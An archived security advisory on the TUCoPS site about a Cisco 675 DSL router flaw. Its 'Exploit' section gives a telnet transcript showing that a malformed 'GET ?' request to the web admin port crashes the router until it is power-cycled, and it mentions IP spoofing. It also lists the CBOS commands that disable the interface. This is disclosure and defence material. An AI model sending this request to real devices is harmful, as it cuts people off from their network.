Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Cisco :: cisco42.htm

Cisco 675 DSL Router crash with a simple GET Request



Vulnerability

    Cisco

Affected

    Cisco 675 DSL Router

Description

    CDI  found  following.   The  Cisco  675  DSL routers with the Web
    Administration Interface  enabled can  be crashed  (hard) using  a
    simple GET request.  CBOS  versions 2.0.x through 2.2.x have  been
    found to be vulnerable.  The  new CBOS 2.3.x has not been  tested,
    but there are  no notes in  the 2.3.x changelogs  to indicate that
    they've fixed this problem.  Effected 675s were configured in  PPP
    mode.  The  'Web Administration Interface'  is enabled by  default
    in CBOS revisions 2.0.x and 2.2.x.

    The Cisco 67x series of  DSL routers are produced and  distributed
    for specific  telcos to  offer to  their clients  and as such, the
    installation base  is quite  large. (To  hazzard a  guess, if just
    20% of all Qwest DSL users are using Cisco 675s, the  installation
    base  would  exceed  25,000)  The  DSL  adapters  in  this  series
    include:  Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco  677,
    and Cisco 678.  This advisory applies specifically to the 675  but
    other  adapters  in  this  series  may  have  similar problems and
    should be tested  for vulnerability to  this type of  attack.  The
    CBOS codebase is  an aquired OS  and as such,  has no relationship
    at all to the main Cisco IOS codebase.

    Exploit:

        telnet vic.tim.ip.addr 80
        Connected to vic.tim.ip.addr.
        Escape character is '^]'.
        GET / HTTP/1.0
        HTTP/1.0 401 Unauthorized
        Content-type: text/html
        WWW-Authenticate: Basic realm="CISCO_WEB"

        <CENTER><h1>Unauthorized Access 401</h1></center>
        Connection closed by foreign host.

    Now kill it:

        telnet vic.tim.ip.addr 80
        Trying vic.tim.ip.addr...
        Connected to vic.tim.ip.addr.
        Escape character is '^]'.
        GET ? [LF][LF]

    Your telnet session dies here, and so does the router.

    Dead as a post:

        ping -c5 vic.tim.ip.addr
        PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
        5 packets transmitted, 0 packets received, 100% packet loss

    The  Cisco  never  recovers  -  it's  hosed  until  the  router is
    power-cycled.  A simple 'GET ?  \n\n' is all it takes to  kill the
    router.   In case  you're wondering,  CDI had  meant to enter 'GET
	/', but his finger slipped on the shift key. Neat eh?

    This exploit works on a Cisco 677 running CBOS 2.2.0.002.  It does
    not  work  when  you  specify  the  web  server  to  only   accept
    connections from certain IP's.  You could spoof them, but have fun
    guessing the IP.

Solution

    Disable the Web Based Administration Interface in your 675 until a
    patch or  CBOS revision  is made  available.   Web Server  Disable
    commands (2.0.x or better):

        (CBOS 'enable' mode) cbos# set web disabled
                             cbos# write
                             cbos# reboot

    For solution see:

        http://oliver.efri.hr/~crv/security/bugs/Others/cisco43.html


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH